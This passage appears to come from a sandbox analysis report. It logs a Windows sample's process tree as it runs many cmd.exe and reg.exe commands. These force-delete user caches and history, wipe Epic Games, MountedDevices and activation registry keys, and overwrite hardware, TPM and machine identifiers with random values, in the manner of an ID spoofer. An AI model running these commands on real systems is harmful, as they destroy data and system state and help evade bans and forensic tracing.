    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatUaCache
    3⤵
    PID:5728
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d %random% /f
    3⤵
    PID:5336
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d 24244 /f
      4⤵
      PID:5964
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatCache
    3⤵
    PID:5504
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f
    3⤵
    PID:5740
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5824
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 24244 /f
      4⤵
      Modifies registry key
      PID:4108
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\DNTException
    3⤵
    PID:2360
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE
    3⤵
    PID:5288
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:832
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 24247 /f
      4⤵
      PID:5380
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:5368
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f
    3⤵
    PID:5308
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {24247-17542-7616-25356} /f
      4⤵
      Modifies registry key
      PID:712
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History\Low
    3⤵
    PID:5348
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\Intel
    3⤵
    PID:2364
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG delete HKCU\Software\Epic" "Games /f
    3⤵
    PID:5648
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic" "Games /f
      4⤵
      PID:5796
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\system_no_output32\config\system_no_outputprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:6004
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f
    3⤵
    PID:5920
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 24247-17542-7616-253563436 /f
      4⤵
      PID:5820
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:5716
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
    3⤵
    PID:5168
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
      4⤵
      PID:5496
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:5992
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
    3⤵
    PID:6116
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
      4⤵
      PID:5612
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\EpicGamesLauncher
    3⤵
    PID:5400
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
    3⤵
    PID:5348
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
      4⤵
      PID:5124
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngine
    3⤵
    PID:5512
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngineLauncher
    3⤵
    PID:5888
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCR\com.epicgames.launcher /f
    3⤵
    PID:5964
  - - C:\Windows\system32\reg.exe
      reg delete HKCR\com.epicgames.launcher /f
      4⤵
      PID:5740
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD
    3⤵
    PID:2748
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:5208
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      Modifies registry key
      PID:272
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\INTEL
    3⤵
    PID:5380
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:5992
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:5284
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache
    3⤵
    PID:5792
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\system_no_output Volume Information\IndexerVolumeGuid
    3⤵
    PID:5488
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3964
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:5584
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4968
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      PID:5348
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0
    3⤵
    PID:5404
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5888
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:3200
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      PID:5704
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v3.0
    3⤵
    PID:5432
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:5724
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      PID:400
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Internet Explorer\Recovery
    3⤵
    PID:1904
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
    3⤵
    PID:5424
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
      4⤵
      PID:5800
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds
    3⤵
    PID:5580
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5612
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 24254-6271-105777947 /f
      4⤵
      PID:5308
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:5296
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4532
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 24254-6271-105777947 /f
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:804
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Windows\system_no_output32\restore\MachineGuid.txt
    3⤵
    PID:5460
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5784
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 24254-6271-105777947 /f
      4⤵
      Modifies registry key
      PID:5964
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\ProgramData\Microsoft\Windows\WER
    3⤵
    PID:5988
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:5568
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
      4⤵
      PID:5844
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\Public\Libraries
    3⤵
    PID:5156
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5868
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:2348
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 24254-6271-105777947 /f
      4⤵
      PID:5808
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\MSOCache
    3⤵
    PID:5412
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1380
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:4108
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5968
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 24257-17020-2844132010 /f
      4⤵
      Modifies registry key
      PID:5924
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:6116
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 24257-17020-2844132010 /f
      4⤵
      PID:5980
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:5648
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      PID:5784
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
    3⤵
    PID:5272
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
      4⤵
      Modifies registry key
      PID:5160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:2532
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:5700
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:5472
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5900
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      PID:5856
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:5792
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      PID:5740
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:5976
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      PID:5652
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:5840
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
      4⤵
      PID:60
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:3616
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 24260277681353723305119272183625283175445098200072123725578 /f
      4⤵
      Modifies registry class
      PID:5348
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:6104
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d 24260-27768-1353723305 /f
      4⤵
      PID:832
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5904
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 24264-5748-3140114601 /f
      4⤵
      Modifies registry key
      PID:6032
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5628
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5648
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d 24264-5748-3140114601 /f
      4⤵
      PID:5928
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
    3⤵
    PID:5988
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
      4⤵
      Modifies registry key
      PID:5264
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:6004
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d 24264-5748-3140114601 /f
      4⤵
      PID:5380
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5476
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d 24264-5748-3140114601 /f
      4⤵
      Modifies registry key
      PID:3992
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
    3⤵
    PID:712
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
      4⤵
      Modifies registry key
      PID:5616
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
    3⤵
    PID:5612
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
      4⤵
      PID:5236
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
    3⤵
    PID:6028
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
      4⤵
      PID:5552
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:6052
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      Modifies registry key
      PID:804
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
    3⤵
    PID:5864
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
      4⤵
      PID:5404
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Hex-Rays\IDA\History /f
    3⤵
    PID:5504
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History /f
      4⤵
      Modifies registry key
      PID:3120
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
    3⤵
    PID:5328
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
      4⤵
      PID:5812
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:3992
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      Modifies registry key
      PID:2348
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5616
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 242671649716497589632556296893150811689535377112094125666 /f
      4⤵
      PID:5436
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5444
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 2427027245159429959101028481853876221865156320793 /f
      4⤵
      Modifies registry class
      PID:5536
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5892
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:60
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 24270272451594299591010284818538762218651563 /f
      4⤵
      Modifies registry key
      PID:5632
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5320
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 242702724515942995910102848185387622186515632079325710 /f
      4⤵
      PID:5732
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5852
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 242702724515942995910102848185387622186515632079325710 /f
      4⤵
      PID:1424
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5404
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 2427027245159429959101028481853876221865 /f
      4⤵
      Modifies Internet Explorer settings
      Modifies registry key
      PID:5140
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5340
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 2427352261945821254204174775496558355608 /f
      4⤵
      PID:6004
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5328
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5856
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 2427352261945821254204174775496558355608 /f
      4⤵
      PID:5652
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:5468
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 24273522619458 /f
      4⤵
      PID:5236
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:5256
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 24273522619458 /f
      4⤵
      PID:5980
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:3640
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 24273522619458 /f
      4⤵
      PID:6052
